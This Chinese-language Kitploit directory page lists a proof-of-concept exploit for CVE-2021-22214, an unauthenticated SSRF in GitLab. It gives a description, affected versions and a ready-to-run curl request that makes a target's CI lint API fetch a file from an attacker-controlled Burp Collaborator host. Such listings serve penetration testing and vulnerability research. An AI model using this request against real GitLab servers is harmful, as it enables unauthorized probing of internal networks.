Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
GitLab-SSRF-CVE-2021-22214 — CVE-2021-22214 的概念验证漏洞利用程序,该漏洞是 GitLab webhooks 中的服务器端请求伪造(SSRF),允许未经身份验证的攻击者发起内部 HTTP 请求。 | Kitploit
工具/GitHubGitHub/kh4sh3i/gitlab-ssrf-cve-2021-22214
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全
GitHubkh4sh3i/gitlab-ssrf-cve-2021-22214

GitLab-SSRF-CVE-2021-22214

CVE-2021-22214 的概念验证漏洞利用程序,该漏洞是 GitLab webhooks 中的服务器端请求伪造(SSRF),允许未经身份验证的攻击者发起内部 HTTP 请求。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
3134年前尚未审核
分享

CVE-2021-22214

CVE-2021-22214 的 POC:Gitlab SSRF

描述

远程 GitLab 安装中存在一个服务器端请求伪造(SSRF)漏洞,原因是内部网络的 webhook 被启用。远程未认证的攻击者可以利用一个注册受限的 GitLab 实例,使其向攻击者选择的任意域名发起 HTTP 请求。

用法

  • Python 代码

    root@kitploit:~
    usage:   python3 GitLab_SSRF.py <target> <burp_collaborator_url>
    
  • Curl 命令

root@kitploit:~
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}' 

影响范围

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

参考

  • GitLab SSRF (CVE-2021-22214)
  • tenable.com
下载工具